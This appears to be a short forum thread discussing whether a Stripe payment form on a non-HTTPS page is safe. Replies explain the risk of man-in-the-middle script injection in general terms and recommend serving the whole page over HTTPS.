I was ready to pay, and then it asked me to put my credit card information into a non-secure page. Looking at the page source, it looks like they use Stripe for payments. Will the credit card details be transmitted encrypted once I press the submit button, or are they transmitting the details in the clear?
The Stripe JavaScript will submit your details over HTTPS. To prevent this very concern (the perception that submitted data will not be secured), sites should serve their forms over HTTPS as well.
Unless someone substituted the javascript served by the page over unprotected HTTP (while it was sent to you). Firesheep already showed that making similar process user-friendly isn't that hard.
Having pre-submission pages (or anything leading to the submission of sensitive data) not be over HTTPS is more than just an issue of perception; for example, a network attacker can inject javascript into the unsecure form page and read/send off the credit card details before the form is even submitted.
Since more than one of the replies I me mention this, I'll reply to myself...
It is correct that serving the necessary JavaScript over HTTPS is the Right Thing To Do as it prevents injection. IIRC (I'm on my phone and not where I can research) Stripe serves the JavaScript themselves over HTTPS (you pull their scripts from their server) and this problem is solved.
While I understated the concern about serving forms unsecured, the same MITM problem is a potential issue for the page containing the form. The solution is the same: serve over HTTPS.
If the page is not HTTPS an attacker could inject html to redirect your data a site which is not stripe (say the attackers fake stripe). HTTP stripe forms are not secure.
